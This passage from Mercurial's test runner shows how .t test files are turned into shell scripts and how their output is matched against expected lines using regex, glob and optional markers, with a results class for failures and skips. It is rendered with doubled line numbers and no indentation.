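#   after    == {-1: [b'  $ echo hi\n']}
#   expected == {0:  [b'hi\n']}
# with both dicts keyed by 0-based source line numbers.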
1725
1725
1726 pos = prepos = -1
1726 pos = prepos = -1
1727
1727
1728 # True or False when in a true or false conditional section
1728 # True or False when in a true or false conditional section
1729 skipping = None
1729 skipping = None
1730
1730
1731 # We keep track of whether or not we're in a Python block so we
1731 # We keep track of whether or not we're in a Python block so we
1732 # can generate the surrounding doctest magic.
1732 # can generate the surrounding doctest magic.
1733 inpython = False
1733 inpython = False
1734
1734
1735 if self._debug:
1735 if self._debug:
1736 script.append(b'set -x\n')
1736 script.append(b'set -x\n')
1737 if self._hgcommand != b'hg':
1737 if self._hgcommand != b'hg':
1738 script.append(b'alias hg="%s"\n' % self._hgcommand)
1738 script.append(b'alias hg="%s"\n' % self._hgcommand)
1739 if os.getenv('MSYSTEM'):
1739 if os.getenv('MSYSTEM'):
1740 script.append(b'alias pwd="pwd -W"\n')
1740 script.append(b'alias pwd="pwd -W"\n')
1741
1741
1742 if hgcatapult and hgcatapult != os.devnull:
1742 if hgcatapult and hgcatapult != os.devnull:
1743 if PYTHON3:
1743 if PYTHON3:
1744 hgcatapult = hgcatapult.encode('utf8')
1744 hgcatapult = hgcatapult.encode('utf8')
1745 cataname = self.name.encode('utf8')
1745 cataname = self.name.encode('utf8')
1746 else:
1746 else:
1747 cataname = self.name
1747 cataname = self.name
1748
1748
1749 # Kludge: use a while loop to keep the pipe from getting
1749 # Kludge: use a while loop to keep the pipe from getting
1750 # closed by our echo commands. The still-running file gets
1750 # closed by our echo commands. The still-running file gets
1751 # reaped at the end of the script, which causes the while
1751 # reaped at the end of the script, which causes the while
1752 # loop to exit and closes the pipe. Sigh.
1752 # loop to exit and closes the pipe. Sigh.
1753 script.append(
1753 script.append(
1754 b'rtendtracing() {\n'
1754 b'rtendtracing() {\n'
1755 b' echo END %(session)s %(name)s >> %(catapult)s\n'
1755 b' echo END %(session)s %(name)s >> %(catapult)s\n'
1756 b' rm -f "$TESTTMP/.still-running"\n'
1756 b' rm -f "$TESTTMP/.still-running"\n'
1757 b'}\n'
1757 b'}\n'
1758 b'trap "rtendtracing" 0\n'
1758 b'trap "rtendtracing" 0\n'
1759 b'touch "$TESTTMP/.still-running"\n'
1759 b'touch "$TESTTMP/.still-running"\n'
1760 b'while [ -f "$TESTTMP/.still-running" ]; do sleep 1; done '
1760 b'while [ -f "$TESTTMP/.still-running" ]; do sleep 1; done '
1761 b'> %(catapult)s &\n'
1761 b'> %(catapult)s &\n'
1762 b'HGCATAPULTSESSION=%(session)s ; export HGCATAPULTSESSION\n'
1762 b'HGCATAPULTSESSION=%(session)s ; export HGCATAPULTSESSION\n'
1763 b'echo START %(session)s %(name)s >> %(catapult)s\n'
1763 b'echo START %(session)s %(name)s >> %(catapult)s\n'
1764 % {
1764 % {
1765 b'name': cataname,
1765 b'name': cataname,
1766 b'session': session,
1766 b'session': session,
1767 b'catapult': hgcatapult,
1767 b'catapult': hgcatapult,
1768 }
1768 }
1769 )
1769 )
1770
1770
1771 if self._case:
1771 if self._case:
1772 casestr = b'#'.join(self._case)
1772 casestr = b'#'.join(self._case)
1773 if isinstance(self._case, str):
1773 if isinstance(self._case, str):
1774 quoted = shellquote(casestr)
1774 quoted = shellquote(casestr)
1775 else:
1775 else:
1776 quoted = shellquote(casestr.decode('utf8')).encode('utf8')
1776 quoted = shellquote(casestr.decode('utf8')).encode('utf8')
1777 script.append(b'TESTCASE=%s\n' % quoted)
1777 script.append(b'TESTCASE=%s\n' % quoted)
1778 script.append(b'export TESTCASE\n')
1778 script.append(b'export TESTCASE\n')
1779
1779
1780 n = 0
1780 n = 0
1781 for n, l in enumerate(lines):
1781 for n, l in enumerate(lines):
1782 if not l.endswith(b'\n'):
1782 if not l.endswith(b'\n'):
1783 l += b'\n'
1783 l += b'\n'
1784 if l.startswith(b'#require'):
1784 if l.startswith(b'#require'):
1785 lsplit = l.split()
1785 lsplit = l.split()
1786 if len(lsplit) < 2 or lsplit[0] != b'#require':
1786 if len(lsplit) < 2 or lsplit[0] != b'#require':
1787 after.setdefault(pos, []).append(
1787 after.setdefault(pos, []).append(
1788 b' !!! invalid #require\n'
1788 b' !!! invalid #require\n'
1789 )
1789 )
1790 if not skipping:
1790 if not skipping:
1791 haveresult, message = self._hghave(lsplit[1:])
1791 haveresult, message = self._hghave(lsplit[1:])
1792 if not haveresult:
1792 if not haveresult:
1793 script = [b'echo "%s"\nexit 80\n' % message]
1793 script = [b'echo "%s"\nexit 80\n' % message]
1794 break
1794 break
1795 after.setdefault(pos, []).append(l)
1795 after.setdefault(pos, []).append(l)
1796 elif l.startswith(b'#if'):
1796 elif l.startswith(b'#if'):
1797 lsplit = l.split()
1797 lsplit = l.split()
1798 if len(lsplit) < 2 or lsplit[0] != b'#if':
1798 if len(lsplit) < 2 or lsplit[0] != b'#if':
1799 after.setdefault(pos, []).append(b' !!! invalid #if\n')
1799 after.setdefault(pos, []).append(b' !!! invalid #if\n')
1800 if skipping is not None:
1800 if skipping is not None:
1801 after.setdefault(pos, []).append(b' !!! nested #if\n')
1801 after.setdefault(pos, []).append(b' !!! nested #if\n')
1802 skipping = not self._iftest(lsplit[1:])
1802 skipping = not self._iftest(lsplit[1:])
1803 after.setdefault(pos, []).append(l)
1803 after.setdefault(pos, []).append(l)
1804 elif l.startswith(b'#else'):
1804 elif l.startswith(b'#else'):
1805 if skipping is None:
1805 if skipping is None:
1806 after.setdefault(pos, []).append(b' !!! missing #if\n')
1806 after.setdefault(pos, []).append(b' !!! missing #if\n')
1807 skipping = not skipping
1807 skipping = not skipping
1808 after.setdefault(pos, []).append(l)
1808 after.setdefault(pos, []).append(l)
1809 elif l.startswith(b'#endif'):
1809 elif l.startswith(b'#endif'):
1810 if skipping is None:
1810 if skipping is None:
1811 after.setdefault(pos, []).append(b' !!! missing #if\n')
1811 after.setdefault(pos, []).append(b' !!! missing #if\n')
1812 skipping = None
1812 skipping = None
1813 after.setdefault(pos, []).append(l)
1813 after.setdefault(pos, []).append(l)
1814 elif skipping:
1814 elif skipping:
1815 after.setdefault(pos, []).append(l)
1815 after.setdefault(pos, []).append(l)
1816 elif l.startswith(b' >>> '): # python inlines
1816 elif l.startswith(b' >>> '): # python inlines
1817 after.setdefault(pos, []).append(l)
1817 after.setdefault(pos, []).append(l)
1818 prepos = pos
1818 prepos = pos
1819 pos = n
1819 pos = n
1820 if not inpython:
1820 if not inpython:
1821 # We've just entered a Python block. Add the header.
1821 # We've just entered a Python block. Add the header.
1822 inpython = True
1822 inpython = True
1823 addsalt(prepos, False) # Make sure we report the exit code.
1823 addsalt(prepos, False) # Make sure we report the exit code.
1824 script.append(b'"%s" -m heredoctest <<EOF\n' % PYTHON)
1824 script.append(b'"%s" -m heredoctest <<EOF\n' % PYTHON)
1825 addsalt(n, True)
1825 addsalt(n, True)
1826 script.append(l[2:])
1826 script.append(l[2:])
1827 elif l.startswith(b' ... '): # python inlines
1827 elif l.startswith(b' ... '): # python inlines
1828 after.setdefault(prepos, []).append(l)
1828 after.setdefault(prepos, []).append(l)
1829 script.append(l[2:])
1829 script.append(l[2:])
1830 elif l.startswith(b' $ '): # commands
1830 elif l.startswith(b' $ '): # commands
1831 if inpython:
1831 if inpython:
1832 script.append(b'EOF\n')
1832 script.append(b'EOF\n')
1833 inpython = False
1833 inpython = False
1834 after.setdefault(pos, []).append(l)
1834 after.setdefault(pos, []).append(l)
1835 prepos = pos
1835 prepos = pos
1836 pos = n
1836 pos = n
1837 addsalt(n, False)
1837 addsalt(n, False)
1838 rawcmd = l[4:]
1838 rawcmd = l[4:]
1839 cmd = rawcmd.split()
1839 cmd = rawcmd.split()
1840 toggletrace(rawcmd)
1840 toggletrace(rawcmd)
1841 if len(cmd) == 2 and cmd[0] == b'cd':
1841 if len(cmd) == 2 and cmd[0] == b'cd':
1842 rawcmd = b'cd %s || exit 1\n' % cmd[1]
1842 rawcmd = b'cd %s || exit 1\n' % cmd[1]
1843 script.append(rawcmd)
1843 script.append(rawcmd)
1844 elif l.startswith(b' > '): # continuations
1844 elif l.startswith(b' > '): # continuations
1845 after.setdefault(prepos, []).append(l)
1845 after.setdefault(prepos, []).append(l)
1846 script.append(l[4:])
1846 script.append(l[4:])
1847 elif l.startswith(b' '): # results
1847 elif l.startswith(b' '): # results
1848 # Queue up a list of expected results.
1848 # Queue up a list of expected results.
1849 expected.setdefault(pos, []).append(l[2:])
1849 expected.setdefault(pos, []).append(l[2:])
1850 else:
1850 else:
1851 if inpython:
1851 if inpython:
1852 script.append(b'EOF\n')
1852 script.append(b'EOF\n')
1853 inpython = False
1853 inpython = False
1854 # Non-command/result. Queue up for merged output.
1854 # Non-command/result. Queue up for merged output.
1855 after.setdefault(pos, []).append(l)
1855 after.setdefault(pos, []).append(l)
1856
1856
1857 if inpython:
1857 if inpython:
1858 script.append(b'EOF\n')
1858 script.append(b'EOF\n')
1859 if skipping is not None:
1859 if skipping is not None:
1860 after.setdefault(pos, []).append(b' !!! missing #endif\n')
1860 after.setdefault(pos, []).append(b' !!! missing #endif\n')
1861 addsalt(n + 1, False)
1861 addsalt(n + 1, False)
1862 # Need to end any current per-command trace
1862 # Need to end any current per-command trace
1863 if activetrace:
1863 if activetrace:
1864 toggletrace()
1864 toggletrace()
1865 return salt, script, after, expected
1865 return salt, script, after, expected
1866
1866
1867 def _processoutput(self, exitcode, output, salt, after, expected):
1867 def _processoutput(self, exitcode, output, salt, after, expected):
1868 # Merge the script output back into a unified test.
1868 # Merge the script output back into a unified test.
1869 warnonly = WARN_UNDEFINED # 1: not yet; 2: yes; 3: for sure not
1869 warnonly = WARN_UNDEFINED # 1: not yet; 2: yes; 3: for sure not
1870 if exitcode != 0:
1870 if exitcode != 0:
1871 warnonly = WARN_NO
1871 warnonly = WARN_NO
1872
1872
1873 pos = -1
1873 pos = -1
1874 postout = []
1874 postout = []
1875 for out_rawline in output:
1875 for out_rawline in output:
1876 out_line, cmd_line = out_rawline, None
1876 out_line, cmd_line = out_rawline, None
1877 if salt in out_rawline:
1877 if salt in out_rawline:
1878 out_line, cmd_line = out_rawline.split(salt, 1)
1878 out_line, cmd_line = out_rawline.split(salt, 1)
1879
1879
1880 pos, postout, warnonly = self._process_out_line(
1880 pos, postout, warnonly = self._process_out_line(
1881 out_line, pos, postout, expected, warnonly
1881 out_line, pos, postout, expected, warnonly
1882 )
1882 )
1883 pos, postout = self._process_cmd_line(cmd_line, pos, postout, after)
1883 pos, postout = self._process_cmd_line(cmd_line, pos, postout, after)
1884
1884
1885 if pos in after:
1885 if pos in after:
1886 postout += after.pop(pos)
1886 postout += after.pop(pos)
1887
1887
1888 if warnonly == WARN_YES:
1888 if warnonly == WARN_YES:
1889 exitcode = False # Set exitcode to warned.
1889 exitcode = False # Set exitcode to warned.
1890
1890
1891 return exitcode, postout
1891 return exitcode, postout
1892
1892
1893 def _process_out_line(self, out_line, pos, postout, expected, warnonly):
1893 def _process_out_line(self, out_line, pos, postout, expected, warnonly):
1894 while out_line:
1894 while out_line:
1895 if not out_line.endswith(b'\n'):
1895 if not out_line.endswith(b'\n'):
1896 out_line += b' (no-eol)\n'
1896 out_line += b' (no-eol)\n'
1897
1897
1898 # Find the expected output at the current position.
1898 # Find the expected output at the current position.
1899 els = [None]
1899 els = [None]
1900 if expected.get(pos, None):
1900 if expected.get(pos, None):
1901 els = expected[pos]
1901 els = expected[pos]
1902
1902
1903 optional = []
1903 optional = []
1904 for i, el in enumerate(els):
1904 for i, el in enumerate(els):
1905 r = False
1905 r = False
1906 if el:
1906 if el:
1907 r, exact = self.linematch(el, out_line)
1907 r, exact = self.linematch(el, out_line)
1908 if isinstance(r, str):
1908 if isinstance(r, str):
1909 if r == '-glob':
1909 if r == '-glob':
1910 out_line = ''.join(el.rsplit(' (glob)', 1))
1910 out_line = ''.join(el.rsplit(' (glob)', 1))
1911 r = '' # Warn only this line.
1911 r = '' # Warn only this line.
1912 elif r == "retry":
1912 elif r == "retry":
1913 postout.append(b' ' + el)
1913 postout.append(b' ' + el)
1914 else:
1914 else:
1915 log('\ninfo, unknown linematch result: %r\n' % r)
1915 log('\ninfo, unknown linematch result: %r\n' % r)
1916 r = False
1916 r = False
1917 if r:
1917 if r:
1918 els.pop(i)
1918 els.pop(i)
1919 break
1919 break
1920 if el:
1920 if el:
1921 if isoptional(el):
1921 if isoptional(el):
1922 optional.append(i)
1922 optional.append(i)
1923 else:
1923 else:
1924 m = optline.match(el)
1924 m = optline.match(el)
1925 if m:
1925 if m:
1926 conditions = [c for c in m.group(2).split(b' ')]
1926 conditions = [c for c in m.group(2).split(b' ')]
1927
1927
1928 if not self._iftest(conditions):
1928 if not self._iftest(conditions):
1929 optional.append(i)
1929 optional.append(i)
1930 if exact:
1930 if exact:
1931 # Don't allow the line to be matched against a later
1931 # Don't allow the line to be matched against a later
1932 # line in the output
1932 # line in the output
1933 els.pop(i)
1933 els.pop(i)
1934 break
1934 break
1935
1935
1936 if r:
1936 if r:
1937 if r == "retry":
1937 if r == "retry":
1938 continue
1938 continue
1939 # clean up any optional leftovers
1939 # clean up any optional leftovers
1940 for i in optional:
1940 for i in optional:
1941 postout.append(b' ' + els[i])
1941 postout.append(b' ' + els[i])
1942 for i in reversed(optional):
1942 for i in reversed(optional):
1943 del els[i]
1943 del els[i]
1944 postout.append(b' ' + el)
1944 postout.append(b' ' + el)
1945 else:
1945 else:
1946 if self.NEEDESCAPE(out_line):
1946 if self.NEEDESCAPE(out_line):
1947 out_line = TTest._stringescape(
1947 out_line = TTest._stringescape(
1948 b'%s (esc)\n' % out_line.rstrip(b'\n')
1948 b'%s (esc)\n' % out_line.rstrip(b'\n')
1949 )
1949 )
1950 postout.append(b' ' + out_line) # Let diff deal with it.
1950 postout.append(b' ' + out_line) # Let diff deal with it.
1951 if r != '': # If line failed.
1951 if r != '': # If line failed.
1952 warnonly = WARN_NO
1952 warnonly = WARN_NO
1953 elif warnonly == WARN_UNDEFINED:
1953 elif warnonly == WARN_UNDEFINED:
1954 warnonly = WARN_YES
1954 warnonly = WARN_YES
1955 break
1955 break
1956 else:
1956 else:
1957 # clean up any optional leftovers
1957 # clean up any optional leftovers
1958 while expected.get(pos, None):
1958 while expected.get(pos, None):
1959 el = expected[pos].pop(0)
1959 el = expected[pos].pop(0)
1960 if el:
1960 if el:
1961 if not isoptional(el):
1961 if not isoptional(el):
1962 m = optline.match(el)
1962 m = optline.match(el)
1963 if m:
1963 if m:
1964 conditions = [c for c in m.group(2).split(b' ')]
1964 conditions = [c for c in m.group(2).split(b' ')]
1965
1965
1966 if self._iftest(conditions):
1966 if self._iftest(conditions):
1967 # Don't append as optional line
1967 # Don't append as optional line
1968 continue
1968 continue
1969 else:
1969 else:
1970 continue
1970 continue
1971 postout.append(b' ' + el)
1971 postout.append(b' ' + el)
1972 return pos, postout, warnonly
1972 return pos, postout, warnonly
1973
1973
1974 def _process_cmd_line(self, cmd_line, pos, postout, after):
1974 def _process_cmd_line(self, cmd_line, pos, postout, after):
1975 """process a "command" part of a line from unified test output"""
1975 """process a "command" part of a line from unified test output"""
1976 if cmd_line:
1976 if cmd_line:
1977 # Add on last return code.
1977 # Add on last return code.
1978 ret = int(cmd_line.split()[1])
1978 ret = int(cmd_line.split()[1])
1979 if ret != 0:
1979 if ret != 0:
1980 postout.append(b' [%d]\n' % ret)
1980 postout.append(b' [%d]\n' % ret)
1981 if pos in after:
1981 if pos in after:
1982 # Merge in non-active test bits.
1982 # Merge in non-active test bits.
1983 postout += after.pop(pos)
1983 postout += after.pop(pos)
1984 pos = int(cmd_line.split()[0])
1984 pos = int(cmd_line.split()[0])
1985 return pos, postout
1985 return pos, postout
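
# Illustration (not in the original file): a captured marker whose tail is
# b' 42 1' makes _process_cmd_line() append the " [1]" exit-status
# annotation for the previous command and then set pos to source line 42.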
1986
1986
1987 @staticmethod
1987 @staticmethod
1988 def rematch(el, l):
1988 def rematch(el, l):
1989 try:
1989 try:
1990 # parse any flags at the beginning of the regex. Only 'i' is
1990 # parse any flags at the beginning of the regex. Only 'i' is
1991 # supported right now, but this should be easy to extend.
1991 # supported right now, but this should be easy to extend.
1992 flags, el = re.match(br'^(\(\?i\))?(.*)', el).groups()[0:2]
1992 flags, el = re.match(br'^(\(\?i\))?(.*)', el).groups()[0:2]
1993 flags = flags or b''
1993 flags = flags or b''
1994 el = flags + b'(?:' + el + b')'
1994 el = flags + b'(?:' + el + b')'
1995 # use \Z to ensure that the regex matches to the end of the string
1995 # use \Z to ensure that the regex matches to the end of the string
1996 if os.name == 'nt':
1996 if os.name == 'nt':
1997 return re.match(el + br'\r?\n\Z', l)
1997 return re.match(el + br'\r?\n\Z', l)
1998 return re.match(el + br'\n\Z', l)
1998 return re.match(el + br'\n\Z', l)
1999 except re.error:
1999 except re.error:
2000 # el is an invalid regex
2000 # el is an invalid regex
2001 return False
2001 return False
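
# Illustration (not in the original file): an expected line written as
# "  abc [0-9]+ (re)" reaches rematch() as br'abc [0-9]+' and only matches
# output such as b'abc 42\n' in full, thanks to the \Z anchor added above.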
2002
2002
2003 @staticmethod
2003 @staticmethod
2004 def globmatch(el, l):
2004 def globmatch(el, l):
2005 # The only supported special characters are * and ? plus / which also
2005 # The only supported special characters are * and ? plus / which also
2006 # matches \ on windows. Escaping of these characters is supported.
2006 # matches \ on windows. Escaping of these characters is supported.
2007 if el + b'\n' == l:
2007 if el + b'\n' == l:
2008 if os.altsep:
2008 if os.altsep:
2009 # matching on "/" is not needed for this line
2009 # matching on "/" is not needed for this line
2010 for pat in checkcodeglobpats:
2010 for pat in checkcodeglobpats:
2011 if pat.match(el):
2011 if pat.match(el):
2012 return True
2012 return True
2013 return b'-glob'
2013 return b'-glob'
2014 return True
2014 return True
2015 el = el.replace(b'$LOCALIP', b'*')
2015 el = el.replace(b'$LOCALIP', b'*')
2016 i, n = 0, len(el)
2016 i, n = 0, len(el)
2017 res = b''
2017 res = b''
2018 while i < n:
2018 while i < n:
2019 c = el[i : i + 1]
2019 c = el[i : i + 1]
2020 i += 1
2020 i += 1
2021 if c == b'\\' and i < n and el[i : i + 1] in b'*?\\/':
2021 if c == b'\\' and i < n and el[i : i + 1] in b'*?\\/':
2022 res += el[i - 1 : i + 1]
2022 res += el[i - 1 : i + 1]
2023 i += 1
2023 i += 1
2024 elif c == b'*':
2024 elif c == b'*':
2025 res += b'.*'
2025 res += b'.*'
2026 elif c == b'?':
2026 elif c == b'?':
2027 res += b'.'
2027 res += b'.'
2028 elif c == b'/' and os.altsep:
2028 elif c == b'/' and os.altsep:
2029 res += b'[/\\\\]'
2029 res += b'[/\\\\]'
2030 else:
2030 else:
2031 res += re.escape(c)
2031 res += re.escape(c)
2032 return TTest.rematch(res, l)
2032 return TTest.rematch(res, l)
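
# Illustration (not in the original file): under the translation above
#   *  ->  .*      ?  ->  .      /  ->  [/\\]  (when os.altsep is set)
# and everything else is re.escape()d, so a glob like b'dir/*.txt' becomes
# a regex roughly equivalent to br'dir[/\\].*\.txt' before being handed to
# rematch().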
2033
2033
2034 def linematch(self, el, l):
2034 def linematch(self, el, l):
2035 if el == l: # perfect match (fast)
2035 if el == l: # perfect match (fast)
2036 return True, True
2036 return True, True
2037 retry = False
2037 retry = False
2038 if isoptional(el):
2038 if isoptional(el):
2039 retry = "retry"
2039 retry = "retry"
2040 el = el[: -len(MARK_OPTIONAL)] + b"\n"
2040 el = el[: -len(MARK_OPTIONAL)] + b"\n"
2041 else:
2041 else:
2042 m = optline.match(el)
2042 m = optline.match(el)
2043 if m:
2043 if m:
2044 conditions = [c for c in m.group(2).split(b' ')]
2044 conditions = [c for c in m.group(2).split(b' ')]
2045
2045
2046 el = m.group(1) + b"\n"
2046 el = m.group(1) + b"\n"
2047 if not self._iftest(conditions):
2047 if not self._iftest(conditions):
2048 # listed feature missing, should not match
2048 # listed feature missing, should not match
2049 return "retry", False
2049 return "retry", False
2050
2050
2051 if el.endswith(b" (esc)\n"):
2051 if el.endswith(b" (esc)\n"):
2052 if PYTHON3:
2052 if PYTHON3:
2053 el = el[:-7].decode('unicode_escape') + '\n'
2053 el = el[:-7].decode('unicode_escape') + '\n'
2054 el = el.encode('utf-8')
2054 el = el.encode('utf-8')
2055 else:
2055 else:
2056 el = el[:-7].decode('string-escape') + '\n'
2056 el = el[:-7].decode('string-escape') + '\n'
2057 if el == l or os.name == 'nt' and el[:-1] + b'\r\n' == l:
2057 if el == l or os.name == 'nt' and el[:-1] + b'\r\n' == l:
2058 return True, True
2058 return True, True
2059 if el.endswith(b" (re)\n"):
2059 if el.endswith(b" (re)\n"):
2060 return (TTest.rematch(el[:-6], l) or retry), False
2060 return (TTest.rematch(el[:-6], l) or retry), False
2061 if el.endswith(b" (glob)\n"):
2061 if el.endswith(b" (glob)\n"):
2062 # ignore '(glob)' added to l by 'replacements'
2062 # ignore '(glob)' added to l by 'replacements'
2063 if l.endswith(b" (glob)\n"):
2063 if l.endswith(b" (glob)\n"):
2064 l = l[:-8] + b"\n"
2064 l = l[:-8] + b"\n"
2065 return (TTest.globmatch(el[:-8], l) or retry), False
2065 return (TTest.globmatch(el[:-8], l) or retry), False
2066 if os.altsep:
2066 if os.altsep:
2067 _l = l.replace(b'\\', b'/')
2067 _l = l.replace(b'\\', b'/')
2068 if el == _l or os.name == 'nt' and el[:-1] + b'\r\n' == _l:
2068 if el == _l or os.name == 'nt' and el[:-1] + b'\r\n' == _l:
2069 return True, True
2069 return True, True
2070 return retry, True
2070 return retry, True
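
# Illustration (not in the original file): an expected line ending in
# " (?)\n" is optional; linematch() strips the marker and returns "retry"
# rather than False on a mismatch, so _process_out_line() records the
# optional line as-is and retries the output against the next expected
# line instead of reporting a failure.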
2071
2071
2072 @staticmethod
2072 @staticmethod
2073 def parsehghaveoutput(lines):
2073 def parsehghaveoutput(lines):
2074 '''Parse hghave log lines.
2074 '''Parse hghave log lines.
2075
2075
2076 Return tuple of lists (missing, failed):
2076 Return tuple of lists (missing, failed):
2077 * the missing/unknown features
2077 * the missing/unknown features
2078 * the features for which existence check failed'''
2078 * the features for which existence check failed'''
2079 missing = []
2079 missing = []
2080 failed = []
2080 failed = []
2081 for line in lines:
2081 for line in lines:
2082 if line.startswith(TTest.SKIPPED_PREFIX):
2082 if line.startswith(TTest.SKIPPED_PREFIX):
2083 line = line.splitlines()[0]
2083 line = line.splitlines()[0]
2084 missing.append(
2084 missing.append(
2085 line[len(TTest.SKIPPED_PREFIX) :].decode('utf-8')
2085 line[len(TTest.SKIPPED_PREFIX) :].decode('utf-8')
2086 )
2086 )
2087 elif line.startswith(TTest.FAILED_PREFIX):
2087 elif line.startswith(TTest.FAILED_PREFIX):
2088 line = line.splitlines()[0]
2088 line = line.splitlines()[0]
2089 failed.append(line[len(TTest.FAILED_PREFIX) :].decode('utf-8'))
2089 failed.append(line[len(TTest.FAILED_PREFIX) :].decode('utf-8'))
2090
2090
2091 return missing, failed
2091 return missing, failed
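
# Illustration (not in the original file): an hghave log line such as
#   b'skipped: missing feature: serve'
# ends up in the returned "missing" list as 'missing feature: serve', while
# b'hghave check failed: ...' lines land in "failed".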
2092
2092
2093 @staticmethod
2093 @staticmethod
2094 def _escapef(m):
2094 def _escapef(m):
2095 return TTest.ESCAPEMAP[m.group(0)]
2095 return TTest.ESCAPEMAP[m.group(0)]
2096
2096
2097 @staticmethod
2097 @staticmethod
2098 def _stringescape(s):
2098 def _stringescape(s):
2099 return TTest.ESCAPESUB(TTest._escapef, s)
2099 return TTest.ESCAPESUB(TTest._escapef, s)
2100
2100
2101
2101
2102 iolock = threading.RLock()
2102 iolock = threading.RLock()
2103 firstlock = threading.RLock()
2103 firstlock = threading.RLock()
2104 firsterror = False
2104 firsterror = False
2105
2105
2106
2106
2107 class TestResult(unittest._TextTestResult):
2107 class TestResult(unittest._TextTestResult):
2108 """Holds results when executing via unittest."""
2108 """Holds results when executing via unittest."""
2109
2109
2110 # Don't worry too much about accessing the non-public _TextTestResult.
2110 # Don't worry too much about accessing the non-public _TextTestResult.
2111 # It is relatively common in Python testing tools.
2111 # It is relatively common in Python testing tools.
2112 def __init__(self, options, *args, **kwargs):
2112 def __init__(self, options, *args, **kwargs):
2113 super(TestResult, self).__init__(*args, **kwargs)
2113 super(TestResult, self).__init__(*args, **kwargs)
2114
2114
2115 self._options = options
2115 self._options = options
2116
2116
2117 # unittest.TestResult didn't have skipped until 2.7. We need to
2117 # unittest.TestResult didn't have skipped until 2.7. We need to
2118 # polyfill it.
2118 # polyfill it.
2119 self.skipped = []
2119 self.skipped = []
2120
2120
2121 # We have a custom "ignored" result that isn't present in any Python
2121 # We have a custom "ignored" result that isn't present in any Python
2122 # unittest implementation. It is very similar to skipped. It may make
2122 # unittest implementation. It is very similar to skipped. It may make
2123 # sense to map it into skip some day.
2123 # sense to map it into skip some day.
2124 self.ignored = []
2124 self.ignored = []
2125
2125
2126 self.times = []
2126 self.times = []
2127 self._firststarttime = None
2127 self._firststarttime = None
2128 # Data stored for the benefit of generating xunit reports.
2128 # Data stored for the benefit of generating xunit reports.
2129 self.successes = []
2129 self.successes = []
2130 self.faildata = {}
2130 self.faildata = {}
2131
2131
2132 if options.color == 'auto':
2132 if options.color == 'auto':
2133 self.color = pygmentspresent and self.stream.isatty()
2133 self.color = pygmentspresent and self.stream.isatty()
2134 elif options.color == 'never':
2134 elif options.color == 'never':
2135 self.color = False
2135 self.color = False
2136 else: # 'always', for testing purposes
2136 else: # 'always', for testing purposes
2137 self.color = pygmentspresent
2137 self.color = pygmentspresent
2138
2138
2139 def onStart(self, test):
2139 def onStart(self, test):
2140 """ Can be overriden by custom TestResult
2140 """ Can be overriden by custom TestResult
2141 """
2141 """
2142
2142
2143 def onEnd(self):
2143 def onEnd(self):
2144 """ Can be overriden by custom TestResult
2144 """ Can be overriden by custom TestResult
2145 """
2145 """
2146
2146
2147 def addFailure(self, test, reason):
2147 def addFailure(self, test, reason):
2148 self.failures.append((test, reason))
2148 self.failures.append((test, reason))
2149
2149
2150 if self._options.first:
2150 if self._options.first:
2151 self.stop()
2151 self.stop()
2152 else:
2152 else:
2153 with iolock:
2153 with iolock:
2154 if reason == "timed out":
2154 if reason == "timed out":
2155 self.stream.write('t')
2155 self.stream.write('t')
2156 else:
2156 else:
2157 if not self._options.nodiff:
2157 if not self._options.nodiff:
2158 self.stream.write('\n')
2158 self.stream.write('\n')
2159 # Exclude the '\n' from highlighting to lex correctly
2159 # Exclude the '\n' from highlighting to lex correctly
2160 formatted = 'ERROR: %s output changed\n' % test
2160 formatted = 'ERROR: %s output changed\n' % test
2161 self.stream.write(highlightmsg(formatted, self.color))
2161 self.stream.write(highlightmsg(formatted, self.color))
2162 self.stream.write('!')
2162 self.stream.write('!')
2163
2163
2164 self.stream.flush()
2164 self.stream.flush()
2165
2165
2166 def addSuccess(self, test):
2166 def addSuccess(self, test):
2167 with iolock:
2167 with iolock:
2168 super(TestResult, self).addSuccess(test)
2168 super(TestResult, self).addSuccess(test)
2169 self.successes.append(test)
2169 self.successes.append(test)
2170
2170
2171 def addError(self, test, err):
2171 def addError(self, test, err):
2172 super(TestResult, self).addError(test, err)
2172 super(TestResult, self).addError(test, err)
2173 if self._options.first:
2173 if self._options.first:
2174 self.stop()
2174 self.stop()
2175
2175
2176 # Polyfill.
2176 # Polyfill.
2177 def addSkip(self, test, reason):
2177 def addSkip(self, test, reason):
2178 self.skipped.append((test, reason))
2178 self.skipped.append((test, reason))
2179 with iolock:
2179 with iolock:
2180 if self.showAll:
2180 if self.showAll:
2181 self.stream.writeln('skipped %s' % reason)
2181 self.stream.writeln('skipped %s' % reason)
2182 else:
2182 else:
2183 self.stream.write('s')
2183 self.stream.write('s')
2184 self.stream.flush()
2184 self.stream.flush()
2185
2185
2186 def addIgnore(self, test, reason):
2186 def addIgnore(self, test, reason):
2187 self.ignored.append((test, reason))
2187 self.ignored.append((test, reason))
2188 with iolock:
2188 with iolock:
2189 if self.showAll:
2189 if self.showAll:
2190 self.stream.writeln('ignored %s' % reason)
2190 self.stream.writeln('ignored %s' % reason)
2191 else:
2191 else:
2192 if reason not in ('not retesting', "doesn't match keyword"):
2192 if reason not in ('not retesting', "doesn't match keyword"):
2193 self.stream.write('i')
2193 self.stream.write('i')
2194 else:
2194 else:
2195 self.testsRun += 1
2195 self.testsRun += 1
2196 self.stream.flush()
2196 self.stream.flush()
2197
2197
2198 def addOutputMismatch(self, test, ret, got, expected):
2198 def addOutputMismatch(self, test, ret, got, expected):
2199 """Record a mismatch in test output for a particular test."""
2199 """Record a mismatch in test output for a particular test."""
2200 if self.shouldStop or firsterror:
2200 if self.shouldStop or firsterror:
2201 # don't print, some other test case already failed and
2201 # don't print, some other test case already failed and
2202 # printed, we're just stale and probably failed due to our
2202 # printed, we're just stale and probably failed due to our
2203 # temp dir getting cleaned up.
2203 # temp dir getting cleaned up.
2204 return
2204 return
2205
2205
2206 accepted = False
2206 accepted = False
2207 lines = []
2207 lines = []
2208
2208
2209 with iolock:
2209 with iolock:
2210 if self._options.nodiff:
2210 if self._options.nodiff:
2211 pass
2211 pass
2212 elif self._options.view:
2212 elif self._options.view:
2213 v = self._options.view
2213 v = self._options.view
2214 subprocess.call(
2214 subprocess.call(
2215 r'"%s" "%s" "%s"'
2215 r'"%s" "%s" "%s"'
2216 % (v, _strpath(test.refpath), _strpath(test.errpath)),
2216 % (v, _strpath(test.refpath), _strpath(test.errpath)),
2217 shell=True,
2217 shell=True,
2218 )
2218 )
2219 else:
2219 else:
2220 servefail, lines = getdiff(
2220 servefail, lines = getdiff(
2221 expected, got, test.refpath, test.errpath
2221 expected, got, test.refpath, test.errpath
2222 )
2222 )
2223 self.stream.write('\n')
2223 self.stream.write('\n')
2224 for line in lines:
